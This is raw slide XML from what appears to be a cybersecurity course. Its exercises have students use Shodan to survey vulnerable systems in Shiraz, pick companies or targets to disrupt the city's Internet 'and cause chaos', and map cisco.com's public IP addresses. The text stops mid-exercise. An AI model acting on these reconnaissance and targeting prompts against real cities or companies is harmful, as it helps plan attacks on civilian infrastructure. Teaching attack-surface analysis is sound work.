              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Shiraz</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4762" y="0"/>
            <a:ext cx="9153525" cy="3509962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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209550" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2100580">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-80" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>Shiraz!</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1192529"/>
            <a:ext cx="8334375" cy="4098925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Let’s research about Shiraz attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>surface:</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Search for Shiraz in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009999"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.shodan.io</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>systems </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>you can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>find?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Can you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>suggest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>method </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to disrupt Shiraz</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Internet?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="374650" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>If you </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>want </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to attack Shiraz which </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>companies </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are on top</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of  your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-90" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>list?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>If you want to attack Shiraz and cause chaos </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>what </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-145" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Compare </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Shiraz and Manchester attack surface, what are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-160" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>your  observations?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>How difficult/easy </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>it is to take </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>remedial</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>actions?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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3429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9973" y="3765169"/>
            <a:ext cx="4927600" cy="559435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Detecting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Surface</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4762" y="0"/>
            <a:ext cx="9153525" cy="3509962"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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209550" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1381125">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>Detecting Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" spc="-105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4400" dirty="0"/>
              <a:t>Surface</a:t>
            </a:r>
            <a:endParaRPr sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1192529"/>
            <a:ext cx="8423275" cy="4342765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In this exercise </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>we </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>going </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to detect Cisco home page  (cisco.com) attack surface – </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>question to answer  is what are publicly routable IP addresses which are  associated with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-50" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cisco.com?!</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2900">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>will you approach this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>challenge?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the best starting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>point?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>How </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are you pivoting to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>intelligence?</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>are possible options for Cisco to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>limit </a:t>
            </a:r>
            <a:r>
